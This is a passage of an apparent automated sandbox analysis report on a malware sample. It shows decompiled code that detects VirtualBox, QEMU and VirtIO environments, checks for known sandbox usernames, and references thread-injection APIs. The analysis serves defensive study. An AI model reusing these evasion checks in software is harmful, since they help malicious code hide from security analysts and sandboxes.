                				_t84 = _v80 & 0x0000ffff;
                				if (_t84 == r12w) goto 0xc809ec92;
                				if ((_t84 & 0x00000008) == 0) goto 0xc809ec88;
                				E00000285285C80C9740(_t128, _v72, L"VEN_VBOX", _v32, _t179, _t180);
                				_t94 =  !=  ? r12d :  !=  ? r12d :  !=  ? r12d : r15d;
                				__imp__#9();
                				 *((intOrPtr*)( *_a16 + 0x10))();
                				if (_t94 != 0) goto 0xc809ecaf;
                				if (_a24 != 0) goto 0xc809eb70;
                				goto 0xc809ecb3;
                				 *((intOrPtr*)( *_a24 + 0x10))();
                				 *((intOrPtr*)( *_a32 + 0x10))();
                				 *((intOrPtr*)( *_v88 + 0x10))();
                				__imp__CoUninitialize(); // executed
                				return _t94;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$ClearVariantwcsstr$AllocFreeUninitialize$Initialize
                • String ID: Caption$Name$PNPDeviceID$SELECT * FROM Win32_PnPDevice$VBOX$VEN_VBOX$WQL
                • API String ID: 2434920835-607120894
                • Opcode ID: 5aa1f58cb5f901136934106e8843b5e603d9b9fd745bbfcba6568d784e6256d7
                • Instruction ID: 8e88e0ddd500e9a7c164f6186e55fcae0359d76ddd936022e0e22fe41a5e53a5
                • Opcode Fuzzy Hash: 5aa1f58cb5f901136934106e8843b5e603d9b9fd745bbfcba6568d784e6256d7
                • Instruction Fuzzy Hash: 1E816D7A302F6086EB10DF65E84829D37A0F784F98F449116EE9E53B68DF78C985CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Thread$AddressContextProc$AllocCreateCurrentHandleModuleProcessResumeVirtual
                • String ID: NtCreateThreadEx$RtlNewSecurityObjectWithMultipleInheritance$ntdll.dll
                • API String ID: 1751073527-1139882446
                • Opcode ID: f92ac50dcbe2c94af1dc0a0c71ddab170fda9b661e52f38cfeb8d8ca3d23f767
                • Instruction ID: 570f287a48d4bd809fe318e82011e54b0329558e5ff22520c0bef678c3b1661e
                • Opcode Fuzzy Hash: f92ac50dcbe2c94af1dc0a0c71ddab170fda9b661e52f38cfeb8d8ca3d23f767
                • Instruction Fuzzy Hash: 79411739212FA481EB508BA1F84835A73E4F786B81F44C127EA4993BA4DF7CC559CF04
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 57%
                			E00000285285C809D380(void* __eflags, signed int __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                				void* _v8;
                				signed int _v24;
                				char _v536;
                				long long _v552;
                				long long _v560;
                				long long _v568;
                				long long _v576;
                				long long _v584;
                				long long _v592;
                				long long _v600;
                				long long _v608;
                				long long _v616;
                				char _v632;
                				long long _v648;
                				void* __rdi;
                				long _t28;
                				void* _t34;
                				void* _t37;
                				void* _t39;
                				signed long long _t44;
                				void* _t67;
                				void* _t71;
                				signed long long _t72;
                				void* _t74;
                
                				_a8 = __rbx;
                				_a16 = __rsi;
                				_t72 = _t71 - 0x2a0;
                				_t44 =  *0xc814c720; // 0xee50a592130
                				_v24 = _t44 ^ _t72;
                				_v616 = L"HARDWARE\\ACPI\\DSDT\\VBOX__";
                				_v608 = L"HARDWARE\\ACPI\\FADT\\VBOX__";
                				_v600 = L"HARDWARE\\ACPI\\RSDT\\VBOX__";
                				_v592 = L"SOFTWARE\\Oracle\\VirtualBox Guest Additions";
                				_v584 = L"SYSTEM\\ControlSet001\\Services\\VBoxGuest";
                				_v576 = L"SYSTEM\\ControlSet001\\Services\\VBoxMouse";
                				_v568 = L"SYSTEM\\ControlSet001\\Services\\VBoxService";
                				_v560 = L"SYSTEM\\ControlSet001\\Services\\VBoxSF";
                				_v552 = L"SYSTEM\\ControlSet001\\Services\\VBoxVideo";
                				asm("o16 nop [eax+eax]");
                				r8d = 0x200;
                				E00000285285C80C8EF0(_t34, 0, _t37, _t39,  &_v536, __rdx, _t67, _t74);
                				E00000285285C809D1D0(_t34, L"SYSTEM\\ControlSet001\\Services\\VBoxVideo",  &_v536, __rdx, L"Checking reg key %s ",  *((intOrPtr*)(_t72 + 0x40 + __rbx * 8)));
                				_v632 = __rsi;
                				r9d = 0x20019;
                				_v648 =  &_v632;
                				r8d = 0;
                				_t28 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
                				if (_t28 == 0) goto 0xc809d48f;
                				if (__rbx + 1 - 9 < 0) goto 0xc809d420;
                				goto 0xc809d49f;
                				RegCloseKey(??);
                				return E00000285285C80C59D0(_t34, _v24 ^ _t72,  *((intOrPtr*)(_t72 + 0x40 + __rbx * 8)),  *((intOrPtr*)(_t72 + 0x40 + __rbx * 8)));
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpen
                • String ID: Checking reg key %s $HARDWARE\ACPI\DSDT\VBOX__$HARDWARE\ACPI\FADT\VBOX__$HARDWARE\ACPI\RSDT\VBOX__$SOFTWARE\Oracle\VirtualBox Guest Additions$SYSTEM\ControlSet001\Services\VBoxGuest$SYSTEM\ControlSet001\Services\VBoxMouse$SYSTEM\ControlSet001\Services\VBoxSF$SYSTEM\ControlSet001\Services\VBoxService$SYSTEM\ControlSet001\Services\VBoxVideo
                • API String ID: 47109696-1723177289
                • Opcode ID: 7c6d4f493a34af7b555b709912d8c17efb4898b449d05045ffe067657bead6d7
                • Instruction ID: e8220d28ebb0d949e5fdce8439ab4c30692996f2a9184db8eaa6834d4e5a6ef9
                • Opcode Fuzzy Hash: 7c6d4f493a34af7b555b709912d8c17efb4898b449d05045ffe067657bead6d7
                • Instruction Fuzzy Hash: 4D311C3A626FA09AEA508B11F44838A73E8F788785F908127EA9D53B64DF3CD154DF40
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Initialize$CreateInstanceSecurityUninitialize
                • String ID: ROOT\CIMV2
                • API String ID: 374467530-2786109267
                • Opcode ID: fe0e92e4dadc3a28f1dd3e5db6db49aa1143a83b0ab456d7d3ad11889142bd40
                • Instruction ID: 1d57f8868777ecd61848cdc88edf9794352a750cb31f028f3a96d30392550cb4
                • Opcode Fuzzy Hash: fe0e92e4dadc3a28f1dd3e5db6db49aa1143a83b0ab456d7d3ad11889142bd40
                • Instruction Fuzzy Hash: 1B418B3A21AFA0C6E7508F25F84874E77A0F788B84F048116EA8A93B68DF3DD155CF00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 46%
                			E00000285285C809CD00() {
                				void* _t1;
                				void* _t4;
                				void* _t5;
                				void* _t7;
                
                				_t1 = E00000285285C80A0220(_t4, _t5, 0xc8112210, _t7); // executed
                				if (_t1 == 0) goto 0xc809cd1b;
                				return 1;
                			}

                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocProcess
                • String ID: VBoxTrayToolWnd$VBoxTrayToolWndClass$kernel32.dll$procexp64.exe$wine_get_unix_file_name
                • API String ID: 1617791916-1515944515
                • Opcode ID: e559b21eaf4453db3006efa7926f78824bda33216fb645cfeb22fd8fc1f14866
                • Instruction ID: 977a629888cfa632ee5a895972094006ba5acc09c024c4fca76b27414433435d
                • Opcode Fuzzy Hash: e559b21eaf4453db3006efa7926f78824bda33216fb645cfeb22fd8fc1f14866
                • Instruction Fuzzy Hash: 7581E36F753F3042FA6467755D8978A0285EF84780F0D822BAE29F72DAEE5DC8014BC1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 46%
                			E00000285285C809EEA0(long long __rbx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
                				void* _v8;
                				signed int _v24;
                				char _v536;
                				char _v1064;
                				char _v1592;
                				long long _v1608;
                				long long _v1616;
                				intOrPtr _v1624;
                				void* __rdi;
                				signed char _t30;
                				void* _t33;
                				void* _t40;
                				void* _t43;
                				signed long long _t50;
                				void* _t65;
                				void* _t70;
                				void* _t77;
                				void* _t80;
                				void* _t83;
                
                				_t83 = __r9;
                				_a16 = __rbp;
                				_a24 = __rsi;
                				_t50 =  *0xc814c720; // 0xee50a592130
                				_v24 = _t50 ^ _t77 - 0x00000670;
                				r8d = 0x208;
                				E00000285285C80C8EF0(_t33, 0, _t40, _t43,  &_v1592, _t65, _t70, _t80);
                				_a8 = __rbx;
                				_v1616 = L"qemu-ga";
                				_v1608 = L"SPICE Guest Tools";
                				asm("o16 nop [eax+eax]");
                				r8d = 0x200;
                				E00000285285C80C8EF0(_t33, 0, 0, _t43,  &_v536, _t65, _t70, _t80);
                				_v1624 = 0;
                				if ( *0xc814e430 == 8) goto 0xc809efe9;
                				if (1 - 0x1e < 0) goto 0xc809ef31;
                				r9d = 0;
                				_t11 = _t83 + 0x26; // 0x26
                				r8d = _t11;
                				__imp__SHGetSpecialFolderPathW();
                				__imp__PathCombineW();
                				E00000285285C809D1D0(0, 0x285c814e460,  &_v536,  &_v1064, L"Checking QEMU directory %s ",  &_v1592);
                				_t30 = GetFileAttributesW(??); // executed
                				if (_t30 == 0xffffffff) goto 0xc809efad;
                				if ((_t30 & 0x00000010) != 0) goto 0xc809f068;
                				if (_t70 + 1 - 2 < 0) goto 0xc809ef10;
                				return E00000285285C80C59D0(0, _v24 ^ _t77 - 0x00000670,  &_v1064,  &_v1592);
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Path$AttributesCombineCurrentEnvironmentExpandFileFolderProcessSpecialStrings
                • String ID: %ProgramW6432%$Checking QEMU directory %s $SPICE Guest Tools$qemu-ga
                • API String ID: 3908115579-2146621234
                • Opcode ID: 088ef6efb16eb6c2bb64d86321745261a28a4a8d70cfc7deaef236013a9aa593
                • Instruction ID: acf29809158818f10b164cb6df65ae91f463acc0eca5cc3dab22c2564ff04a41
                • Opcode Fuzzy Hash: 088ef6efb16eb6c2bb64d86321745261a28a4a8d70cfc7deaef236013a9aa593
                • Instruction Fuzzy Hash: CC41AF3A216FA4C5EB208F14E44839E73A5F789B85F948227D69D53BA5DF3CC905CB40
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Heap$Process$AdaptersAllocFreeInfo
                • String ID:
                • API String ID: 2824440793-0
                • Opcode ID: 9c061581dfea897cd26754b9f8105845bc69f0a82cb52782afe093cfc218019c
                • Instruction ID: bcbb4d81217d2bfb0d51127ce91dd3faa7522c6adff53e894a279f69a5e5ae9c
                • Opcode Fuzzy Hash: 9c061581dfea897cd26754b9f8105845bc69f0a82cb52782afe093cfc218019c
                • Instruction Fuzzy Hash: 88318B3D607FA082EB948B56A45829967E1E78AB81F08C067EE4913755EE3CC5548B01
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 55%
                			E00000285285C809D870(void* __eflags, signed int __rbx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
                				void* _v8;
                				signed int _v24;
                				char _v536;
                				long long _v552;
                				long long _v560;
                				long long _v568;
                				long long _v576;
                				long long _v584;
                				long long _v600;
                				intOrPtr _v608;
                				intOrPtr _v616;
                				void* __rdi;
                				void* _t32;
                				void* _t36;
                				void* _t38;
                				signed long long _t43;
                				long long _t49;
                				void* _t59;
                				void* _t66;
                				signed long long _t67;
                				void* _t69;
                				void* _t71;
                
                				_t71 = __r9;
                				_a8 = __rbx;
                				_a16 = __rbp;
                				_a24 = __rsi;
                				_t67 = _t66 - 0x280;
                				_t43 =  *0xc814c720; // 0xee50a592130
                				_v24 = _t43 ^ _t67;
                				_v584 = L"\\\\.\\VBoxMiniRdrDN";
                				_v576 = L"\\\\.\\VBoxGuest";
                				_v568 = L"\\\\.\\pipe\\VBoxMiniRdDN";
                				_v560 = L"\\\\.\\VBoxTrayIPC";
                				_t49 = L"\\\\.\\pipe\\VBoxTrayIPC";
                				_v552 = _t49;
                				_t60 =  *((intOrPtr*)(_t67 + 0x40 + __rbx * 8));
                				r9d = 0;
                				_v600 = __rbp;
                				_v608 = 0x80;
                				_v616 = 3;
                				_t16 = _t71 + 1; // 0x1, executed
                				r8d = _t16;
                				CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
                				r8d = 0x200;
                				E00000285285C80C8EF0(_t32, 0, _t36, _t38,  &_v536, _t59,  *((intOrPtr*)(_t67 + 0x40 + __rbx * 8)), _t69);
                				E00000285285C809D1D0(_t32, _t49,  &_v536, _t59, L"Checking device %s ",  *((intOrPtr*)(_t67 + 0x40 + __rbx * 8)));
                				if (_t49 != 0xffffffff) goto 0xc809d950;
                				if (__rbx + 1 - 5 < 0) goto 0xc809d8e0;
                				goto 0xc809d95e;
                				CloseHandle(??);
                				return E00000285285C80C59D0(_t32, _v24 ^ _t67, _t59, _t60);
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateFileHandle
                • String ID: Checking device %s $\\.\VBoxGuest$\\.\VBoxMiniRdrDN$\\.\VBoxTrayIPC$\\.\pipe\VBoxMiniRdDN$\\.\pipe\VBoxTrayIPC
                • API String ID: 3498533004-4225997269
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Process32$CloseHandleNext$CreateFirstSnapshotToolhelp32
                • String ID:
                • API String ID: 3656348920-0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1072 285c809f810-285c809f91f call 285c80caeac 1075 285c809f921-285c809f931 GetUserNameW 1072->1075 1076 285c809f93b 1072->1076 1077 285c809f933-285c809f936 call 285c80caea4 1075->1077 1078 285c809f959-285c809f975 1075->1078 1079 285c809f940-285c809f958 call 285c80c59d0 1076->1079 1077->1076 1082 285c809f980-285c809f9ae call 285c809d1d0 call 285c80d19f0 1078->1082 1088 285c809f9b0-285c809f9b7 1082->1088 1089 285c809f9bb 1082->1089 1088->1082 1091 285c809f9b9 1088->1091 1090 285c809f9c0-285c809f9e2 call 285c80caea4 1089->1090 1090->1079 1091->1090
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: NameUser
                • String ID: Checking if username matches : %s $CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sandbox$maltest$malware$milozs$sand box$test user$timmy$virus
                • API String ID: 2645101109-2358638013
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1094 285c809e3a0-285c809e3c7 call 285c80a0410 1097 285c809e3cd-285c809e403 SysAllocString * 2 1094->1097 1098 285c809e5ab-285c809e5b3 1094->1098 1099 285c809e405-285c809e408 1097->1099 1100 285c809e45a-285c809e462 1097->1100 1101 285c809e451-285c809e454 SysFreeString 1099->1101 1102 285c809e40a-285c809e426 1099->1102 1103 285c809e46d-285c809e475 1100->1103 1104 285c809e464-285c809e467 SysFreeString 1100->1104 1101->1100 1107 285c809e430-285c809e432 1102->1107 1105 285c809e59d-285c809e5aa 1103->1105 1106 285c809e47b-285c809e48b 1103->1106 1104->1103 1108 285c809e491-285c809e49f 1106->1108 1109 285c809e576-285c809e599 CoUninitialize 1106->1109 1107->1101 1110 285c809e434-285c809e44b CoUninitialize 1107->1110 1111 285c809e4a0-285c809e4bf 1108->1111 1109->1105 1110->1101 1115 285c809e572 1111->1115 1116 285c809e4c5-285c809e4e1 1111->1116 1115->1109 1119 285c809e4e7-285c809e4e9 1116->1119 1121 285c809e4eb-285c809e4f3 1119->1121 1122 285c809e559-285c809e56a 1119->1122 1121->1122 1123 285c809e4f5-285c809e4f7 1121->1123 1122->1111 1128 285c809e570 1122->1128 1124 285c809e54f-285c809e553 VariantClear 1123->1124 1125 285c809e4f9-285c809e50c call 285c80c9740 1123->1125 1124->1122 1130 285c809e54d 1125->1130 1131 285c809e50e-285c809e521 call 285c80c9740 1125->1131 1128->1109 1130->1124 1131->1130 1134 285c809e523-285c809e536 call 285c80c9740 1131->1134 1134->1130 1137 285c809e538-285c809e54b call 285c80c9740 1134->1137 1137->1124 1137->1130
                C-Code - Quality: 26%
                			E00000285285C809E3A0(void* __edx, void* __rax, long long __rbx, long long __rsi, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
                				long long _v24;
                				long long _v32;
                				long long _v40;
                				intOrPtr _v56;
                				signed short _v64;
                				void* _v72;
                				long long _v80;
                				long long _v88;
                				void* _t53;
                				void* _t54;
                				signed char _t60;
                				intOrPtr _t98;
                				intOrPtr* _t114;
                				long long _t134;
                				long long _t135;
                				void* _t146;
                
                				_t135 = __rsi;
                				_a24 = _t134;
                				_v72 = _t134;
                				_a16 = _t134;
                				_t54 = E00000285285C80A0410(_t53,  &_a24,  &_v72, __rsi); // executed
                				if (_t54 == 0) goto 0xc809e5ab;
                				_v24 = __rbx;
                				_v32 = _t135;
                				_v40 = __r14;
                				__imp__#2();
                				__imp__#2();
                				_t9 = _t134 + 1; // 0x1
                				r14d = _t9;
                				_t104 = __rax;
                				if (__rax == 0) goto 0xc809e45a;
                				if (__rax == 0) goto 0xc809e451;
                				_v80 =  &_a16;
                				_t13 = _t134 + 0x30; // 0x30
                				r9d = _t13;
                				_v88 = _t134;
                				_t145 =  *_a24;
                				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0xc809e451;
                				r14d = 0;
                				 *((intOrPtr*)( *_a24 + 0x10))();
                				 *((intOrPtr*)( *_v72 + 0x10))();
                				__imp__CoUninitialize();
                				__imp__#6();
                				_t137 = _v32;
                				if (__rax == 0) goto 0xc809e46d;
                				__imp__#6();
                				if (r14d == 0) goto 0xc809e59d;
                				_t114 = _a16;
                				_a32 = _t134;
                				_a8 = 0;
                				if (_t114 == 0) goto 0xc809e576;
                				asm("o16 nop [eax+eax]");
                				_v88 =  &_a8;
                				r8d = 1; // executed
                				 *((intOrPtr*)( *_t114 + 0x20))();
                				if (_a8 == 0) goto 0xc809e572;
                				_v80 = _t134;
                				r8d = 0;
                				_v88 = _t134;
                				_t98 =  *_a32; // executed
                				if ( *((intOrPtr*)(_t98 + 0x20))() < 0) goto 0xc809e559;
                				_t60 = _v64 & 0x0000ffff;
                				if (_t60 == 1) goto 0xc809e559;
                				if ((_t60 & 0x00000008) == 0) goto 0xc809e54f;
                				E00000285285C80C9740(__rax, _v56, L"82801FB", _v32,  *_a24, _t146);
                				if (_t98 != 0) goto 0xc809e54d;
                				E00000285285C80C9740(_t104, _v56, L"82441FX", _v32, _t145, _t146);
                				if (_t98 != 0) goto 0xc809e54d;
                				E00000285285C80C9740(_t104, _v56, L"82371SB", _v32, _t145, _t146);
                				if (_t98 != 0) goto 0xc809e54d;
                				E00000285285C80C9740(_t104, _v56, L"OpenHCD", _t137, _t145, _t146);
                				if (_t98 == 0) goto 0xc809e54f;
                				__imp__#9();
                				 *((intOrPtr*)( *_a32 + 0x10))();
                				if (_a16 != 0) goto 0xc809e4a0;
                				goto 0xc809e576;
                				 *((intOrPtr*)( *_a16 + 0x10))();
                				 *((intOrPtr*)( *_a24 + 0x10))();
                				 *((intOrPtr*)( *_v72 + 0x10))();
                				__imp__CoUninitialize(); // executed
                				dil = 1 - 3 >= 0;
                				return 0;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Stringwcsstr$AllocFreeUninitialize$ClearInitializeVariant
                • String ID: 82371SB$82441FX$82801FB$Name$OpenHCD$SELECT * FROM Win32_PnPEntity$WQL
                • API String ID: 1414631806-1350769890
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1140 285c809fa60-285c809fa87 call 285c80a0410 1143 285c809fa8d-285c809fac3 SysAllocString * 2 1140->1143 1144 285c809fc54-285c809fc5c 1140->1144 1145 285c809fac5-285c809fac8 1143->1145 1146 285c809fb1a-285c809fb22 1143->1146 1149 285c809fb11-285c809fb14 SysFreeString 1145->1149 1150 285c809faca-285c809fae6 1145->1150 1147 285c809fb2d-285c809fb3a 1146->1147 1148 285c809fb24-285c809fb27 SysFreeString 1146->1148 1147->1144 1151 285c809fb40-285c809fb4e 1147->1151 1148->1147 1149->1146 1152 285c809faf0-285c809faf2 1150->1152 1153 285c809fc30-285c809fc4e CoUninitialize 1151->1153 1154 285c809fb54-285c809fb58 1151->1154 1152->1149 1155 285c809faf4-285c809fb0b CoUninitialize 1152->1155 1153->1144 1156 285c809fb60-285c809fb7f 1154->1156 1155->1149 1156->1153 1160 285c809fb85-285c809fba1 1156->1160 1163 285c809fba7-285c809fba9 1160->1163 1165 285c809fbfe-285c809fc0f 1163->1165 1166 285c809fbab-285c809fbb0 1163->1166 1165->1156 1173 285c809fc15 1165->1173 1167 285c809fbf4-285c809fbf8 VariantClear 1166->1167 1168 285c809fbb2-285c809fbc6 StrStrIW 1166->1168 1167->1165 1169 285c809fc17-285c809fc2b VariantClear 1168->1169 1170 285c809fbc8-285c809fbdc StrStrIW 1168->1170 1169->1153 1170->1169 1172 285c809fbde-285c809fbf2 StrStrIW 1170->1172 1172->1167 1172->1169 1173->1153
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocClearFreeUninitializeVariant$Initialize
                • String ID: HVM domU$Model$SELECT * FROM Win32_ComputerSystem$VMWare$VirtualBox$WQL
                • API String ID: 4173814494-4167877488
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1175 285c809f410-285c809f4fd call 285c80c8ef0 * 2 GetWindowsDirectoryW call 285c80a00a0 1182 285c809f4ff-285c809f504 Wow64DisableWow64FsRedirection 1175->1182 1183 285c809f50a-285c809f50f 1175->1183 1182->1183 1184 285c809f510-285c809f563 PathCombineW call 285c80c8ef0 call 285c809d1d0 GetFileAttributesW 1183->1184 1189 285c809f565-285c809f567 1184->1189 1190 285c809f569-285c809f570 1184->1190 1189->1190 1191 285c809f574 1189->1191 1190->1184 1192 285c809f572 1190->1192 1193 285c809f579-285c809f589 1191->1193 1192->1193 1194 285c809f590-285c809f593 1193->1194 1195 285c809f5a2-285c809f5b1 1194->1195 1196 285c809f595-285c809f59e 1194->1196 1197 285c809f5b3-285c809f5b5 1195->1197 1198 285c809f601-285c809f62a call 285c80c59d0 1195->1198 1196->1194 1199 285c809f5a0 1196->1199 1200 285c809f5b8-285c809f5bb 1197->1200 1199->1198 1202 285c809f5bd-285c809f5c6 1200->1202 1203 285c809f5ca-285c809f5d8 1200->1203 1202->1200 1205 285c809f5c8 1202->1205 1206 285c809f5df-285c809f5f4 GetCurrentProcess 1203->1206 1207 285c809f5da 1203->1207 1205->1206 1206->1198 1209 285c809f5f6-285c809f5fb Wow64RevertWow64FsRedirection 1206->1209 1207->1206 1209->1198
                C-Code - Quality: 55%
                			E00000285285C809F410(void* __ecx, long long __rbx, signed long long __rdi, long long __rsi) {
                				signed char _t60;
                				void* _t76;
                				void* _t80;
                				signed long long _t93;
                				signed long long _t107;
                				void* _t128;
                				signed long long _t133;
                				WCHAR* _t138;
                				void* _t141;
                				signed long long _t142;
                				void* _t144;
                
                				_t133 = __rdi;
                				_t68 = __ecx;
                				 *((long long*)(_t141 + 8)) = __rbx;
                				 *((long long*)(_t141 + 0x10)) = __rsi;
                				 *((long long*)(_t141 + 0x18)) = __rdi;
                				_t139 = _t141 - 0x5b0;
                				_t142 = _t141 - 0x6b0;
                				_t93 =  *0xc814c720; // 0xee50a592130
                				 *(_t141 - 0x5b0 + 0x5a0) = _t93 ^ _t142;
                				 *((long long*)(_t142 + 0x30)) = L"System32\\drivers\\balloon.sys";
                				r8d = 0x208;
                				 *((long long*)(_t142 + 0x38)) = L"System32\\drivers\\netkvm.sys";
                				 *((long long*)(_t142 + 0x40)) = L"System32\\drivers\\pvpanic.sys";
                				 *((long long*)(_t142 + 0x48)) = L"System32\\drivers\\viofs.sys";
                				 *((long long*)(_t142 + 0x50)) = L"System32\\drivers\\viogpudo.sys";
                				 *((long long*)(_t142 + 0x58)) = L"System32\\drivers\\vioinput.sys";
                				 *((long long*)(_t142 + 0x60)) = L"System32\\drivers\\viorng.sys";
                				 *((long long*)(_t142 + 0x68)) = L"System32\\drivers\\vioscsi.sys";
                				 *((long long*)(_t142 + 0x70)) = L"System32\\drivers\\vioser.sys";
                				 *((long long*)(_t142 + 0x78)) = L"System32\\drivers\\viostor.sys";
                				E00000285285C80C8EF0(__ecx, 0, _t76, _t80, _t141 - 0x5b0 + 0x190, _t128, __rdi, _t144);
                				r8d = 0x208;
                				E00000285285C80C8EF0(_t68, 0, _t76, _t80, _t139 - 0x80, _t128, _t133, _t144);
                				 *(_t142 + 0x28) = _t133;
                				GetWindowsDirectoryW(_t138);
                				if (E00000285285C80A00A0() == 0) goto 0xc809f50a;
                				__imp__Wow64DisableWow64FsRedirection();
                				_t107 = _t133;
                				__imp__PathCombineW();
                				r8d = 0x200;
                				E00000285285C80C8EF0(_t68, 0, 0, _t80, _t139 + 0x3a0, _t139 + 0x190, _t133,  *((intOrPtr*)(_t142 + 0x30 + _t107 * 8)));
                				E00000285285C809D1D0(_t68, L"System32\\drivers\\viostor.sys", _t139 + 0x3a0, _t139 + 0x190, L"Checking file %s ", _t139 - 0x80);
                				_t60 = GetFileAttributesW(??); // executed
                				if (_t60 == 0xffffffff) goto 0xc809f569;
                				if ((_t60 & 0x00000010) == 0) goto 0xc809f574;
                				if (_t107 + 1 - 0xa < 0) goto 0xc809f510;
                				goto 0xc809f579;
                				 *((intOrPtr*)(_t142 + 0x20)) = 0;
                				if ( *0xc814e430 == 8) goto 0xc809f5a2;
                				if (1 - 0x1e < 0) goto 0xc809f590;
                				goto 0xc809f601;
                				if ( *0x285C814E484 == dil) goto 0xc809f601;
                				if ( *0xc814e430 == 8) goto 0xc809f5ca;
                				if (1 - 0x1e < 0) goto 0xc809f5b8;
                				goto 0xc809f5df;
                				if ( *0x285C814E46C == dil) goto 0xc809f5df;
                				GetCurrentProcess();
                				 *((long long*)( *0x285C814E488))();
                				if ( *((intOrPtr*)(_t142 + 0x20)) == 0) goto 0xc809f601;
                				__imp__Wow64RevertWow64FsRedirection();
                				return E00000285285C80C59D0(1,  *(_t139 + 0x5a0) ^ _t142, _t142 + 0x20, _t139 - 0x80);
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Wow64$Redirection$AttributesCombineCurrentDirectoryDisableFilePathProcessRevertWindows
